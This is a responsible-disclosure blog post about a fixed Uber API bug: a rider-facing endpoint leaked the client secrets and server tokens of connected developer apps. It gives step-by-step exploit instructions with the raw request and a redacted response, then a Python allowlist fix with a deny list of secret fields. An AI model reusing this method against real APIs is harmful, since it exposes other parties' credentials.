How we discovered Uber’s developer applications were leaking client secret and server tokens
Security Research


This post is about an information leakage vulnerability on riders.uber.com: we identified a public API endpoint used by https://riders.uber.com/profile that returned the server tokens and client secret of any application the account owner had authorized to access their Uber account.

Anand Prakash
March 25, 2021

This is being published with the permission of Uber under the responsible disclosure policy.


As per Uber’s documentation:

“The secret for your application, this should be treated like your application’s password. Never share this with anyone, check this into source code, or post in any public forum. Additionally, this should not be distributed on client devices where users could decompile your code and access the secret. If you suspect your client_secret has been compromised you may generate a new one in your application’s dashboard which will immediately invalidate the old secret.”

This could have been easily exploited by an attacker by connecting their account to any Uber application on production and then using the profile endpoint to retrieve server tokens and client secrets of the connected application in the API response.

Uber fixed this issue by removing this data from the API response, as reported. Uber publicly notified all developers of this vulnerability and asked developers to rotate secrets on a periodic basis.

[Image: Notification sent by Uber to developers.]

About Uber

Uber is a transportation network company (TNC) headquartered in San Francisco, California. Uber offers services including peer-to-peer ridesharing, taxi cab hailing, food delivery, and a bicycle-sharing system. The company has operations in 785 metropolitan areas worldwide. Uber has a valuation of over $100 billion as per Bloomberg’s report.

How my exploit worked step-by-step

Step #1

The attacker connects any Uber developer application to their own account using OAuth. A few examples of Uber developer applications are IFTTT, Payfare, and Bixby. This is not a complicated procedure; it is the normal "connect app" flow any rider can go through.

Step #2

Once the attacker has connected one of these apps to their Uber account, they can call the endpoint below with their own session data, and the response includes the developer application's confidential data (client secret and server tokens) along with other significant details of the application.

The vulnerable Uber API:

POST /api/getAuthorisedApps HTTP/1.1
Host: riders.uber.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://riders.uber.com/profile
content-type: application/json
x-csrf-token: XXX
origin: https://riders.uber.com
Content-Length: 2
Cookie:

Data getting leaked in API response:

{
 "status": "success",
 "data": {
   "data": {
     "uuid": "xxxx"
   },
   "clientScopes": {
     "authorizedClientScopes": [
       {
         "clientID": "xxx",
         "scopes": [
           "history",
           "offline_access",
           "profile"
         ]
       }
     ]
   },
   "scopeDetails": [
     {
       "applicationDetails": {
         "applicationID": "xxx",
         "owner": {
           "userUUID": "xxxx",
           "userEmail": ""
         },
         "applicationSecret": "xxx",
         "name": "xxx",
         "description": "abc",
         "privacyPolicyURL": "https://appsecure.in",
         "surgeConfirmedRedirectURI": "",
         "webhookURL": "",
         "applicationType": "",
         "requestsPerHour": {
           "low": 0,
           "high": 0,
           "unsigned": false
         },
         "redirectURIs": [
           "xxxxxx"
         ],
         "appSignatures": [],
         "defaultScopes": [
           "history",
           "profile"
         ],
         "whitelistedScopes": [],
         "originURIs": [],
         "serverTokens": [
           "xxx"
         ],
         "ipWhitelist": [],
         "admins": [
           {
             "userUUID": "xxxx",
             "userEmail": ""
           },
           {
             "userUUID": "xxxx",
             "userEmail": ""
           },
           {
             "userUUID": "xxxx",
             "userEmail": ""
           }
         ],
         "developers": [
           {
             "userUUID": "xxxx",
             "userEmail": ""
           }
         ],
         "tags": [],
         "oauthEnabled": false,
         "smsVerificationEnabled": false,
         "cobrandingEnabled": false,
         "supplyOnly": false,
         "isInternal": true,
         "cobrandingDetails": {
           "nativeURL": "",
           "androidFallbackURL": "",
           "iosFallbackURL": "",
           "displayName": "",
           "linkName": "",
           "logoUUID": "",
           "logoFiletype": "",
           "generatedLogoURL": ""
         },
         "availableScopes": [
           "delivery",
           "history",
           "history_lite",
           "places",
           "profile",
           "ride_widgets"
         ],
         "openScopes": [
           "delivery",
           "history",
           "history_lite",
           "places",
           "profile",
           "ride_widgets"
         ],
         "developerScopes": [
           "all_trips",
           "request",
           "request_receipt"
         ],
         "createdAt": {
           "low": "xxx",
           "high": 0,
           "unsigned": false
         },
         "updatedAt": {
           "low": "xxx",
           "high": 0,
           "unsigned": false
         },
         "displayName": null,
         "iconURL": null,
         "publicDescription": null,
         "appGalleryDetails": {
           "mobilePlatforms": [],
           "publicationState": "",
           "redirectURI": "xxxx",
           "permissionState": ""
         }
       },
       "permissions": null,
       "userRoleInvitations": null
     }
   ]
 }
}
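The fix Uber applied was to stop returning developer-side fields in this rider-facing response. As an added illustration (this is not Uber's code, and the key names on the deny list are an assumption drawn from the leaked response above), the Python below rebuilds the response from an allowlist of fields a rider actually needs to review and revoke an app, and then audits the outgoing object for any secret-bearing key before it is sent. The sample internal record is constructed for the example, and it assumes the `clientID` in `authorizedClientScopes` matches the `applicationID` in `applicationDetails`.

```python
"""
Added example (not Uber's code): build a rider-facing view of an authorized
application that contains only the fields the rider legitimately needs, and
audit any outgoing response for secret-bearing keys before it is served.
"""
import copy

# Fields a rider needs in order to review and revoke an authorized app.
# Everything else in the developer-side record (applicationSecret,
# serverTokens, admins, ipWhitelist, ...) stays on the server.
RIDER_VISIBLE_FIELDS = ("applicationID", "name", "description",
                        "privacyPolicyURL", "iconURL", "displayName")

# Key names that must never reach a response served to an end user.
# Assumption for this example: the names mirror the leaked response on the
# page; they are not an Uber-defined set.
SECRET_KEYS = {"applicationSecret", "serverTokens", "clientSecret",
               "admins", "developers", "ipWhitelist", "webhookURL"}


def rider_view(app_record, authorized_scopes):
    """Project the internal application record onto the allowlist."""
    view = {k: app_record.get(k) for k in RIDER_VISIBLE_FIELDS if k in app_record}
    view["scopes"] = sorted(authorized_scopes)
    return view


def find_secret_keys(obj, path="$"):
    """Recursively collect JSON paths whose key is on the deny list."""
    found = []
    if isinstance(obj, dict):
        for k, v in obj.items():
            child = f"{path}.{k}"
            if k in SECRET_KEYS:
                found.append(child)
            found.extend(find_secret_keys(v, child))
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            found.extend(find_secret_keys(v, f"{path}[{i}]"))
    return found


def build_authorized_apps_response(internal_response):
    """Rebuild the getAuthorisedApps response using only allowlisted fields,
    and refuse to emit it if a deny-listed key is still present."""
    out = {"status": internal_response["status"],
           "data": {"data": copy.deepcopy(internal_response["data"]["data"]),
                    "applications": []}}
    scopes_by_client = {
        e["clientID"]: e["scopes"]
        for e in internal_response["data"]["clientScopes"]["authorizedClientScopes"]
    }
    for entry in internal_response["data"]["scopeDetails"]:
        app = entry["applicationDetails"]
        out["data"]["applications"].append(
            rider_view(app, scopes_by_client.get(app["applicationID"], []))
        )
    leaks = find_secret_keys(out)
    if leaks:
        raise RuntimeError(f"refusing to send response with secret fields: {leaks}")
    return out


# Constructed sample of the internal (developer-side) record; all values are
# placeholders, not real Uber identifiers.
INTERNAL_RESPONSE = {
    "status": "success",
    "data": {
        "data": {"uuid": "rider-uuid-placeholder"},
        "clientScopes": {"authorizedClientScopes": [
            {"clientID": "app-1", "scopes": ["history", "offline_access", "profile"]}]},
        "scopeDetails": [{
            "applicationDetails": {
                "applicationID": "app-1",
                "owner": {"userUUID": "owner-uuid", "userEmail": ""},
                "applicationSecret": "SECRET-PLACEHOLDER",
                "name": "Example App",
                "description": "abc",
                "privacyPolicyURL": "https://example.invalid/privacy",
                "serverTokens": ["TOKEN-PLACEHOLDER"],
                "ipWhitelist": [],
                "admins": [{"userUUID": "admin-uuid", "userEmail": ""}],
                "iconURL": None,
                "displayName": None,
            },
            "permissions": None,
            "userRoleInvitations": None,
        }],
    },
}

if __name__ == "__main__":
    import json
    print(json.dumps(build_authorized_apps_response(INTERNAL_RESPONSE), indent=2))
```

Running `find_secret_keys` over the internal record reports the paths of `applicationSecret`, `serverTokens` and `admins`, which is exactly what leaked here; running it over the rebuilt response returns nothing. The allowlist projection is the actual fix, and the deny-list audit is a cheap regression guard that can run in an integration test against any end-user-facing endpoint.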

Disclosure Timeline

October 5th, 2018: Report sent to Uber’s Security team.

November 6th, 2018: Issue resolved by Uber. AppSecure asked Uber to notify all developers in case their app secrets were no longer confidential. We verified the fix.

December 20th, 2018: Uber replied, stating, “They are in process of notifying the developers and in process of putting up long-term fix in place for this issue.”

February 8th, 2019: Uber rewarded us with a $5000 bounty and notified all developers via email about the issue. The issue was publicly disclosed after that notification went out.

ABOUT THE AUTHOR
Anand Prakash

Anand Prakash is a prolific security researcher who is famous for finding bugs in some of the world’s most popular apps and websites. He thrives off of “bug bounties” — large cash prizes he earns from companies in exchange for successfully hacking their systems and showing them their security flaws. Anand is supremely good at what he does, having discovered vulnerabilities at companies like Facebook, Twitter, and Uber. For the past 5 years, Facebook has ranked Anand as one of their top bounty hunters. And on Twitter’s bounty program, he’s ranked #3 worldwide. Anand’s reputation as a hacker has led to him being featured in last year’s Forbes “30 under 30” for enterprise technology in Asia. And a major Indian news website declared Anand “one of India’s best known white hat hackers.”
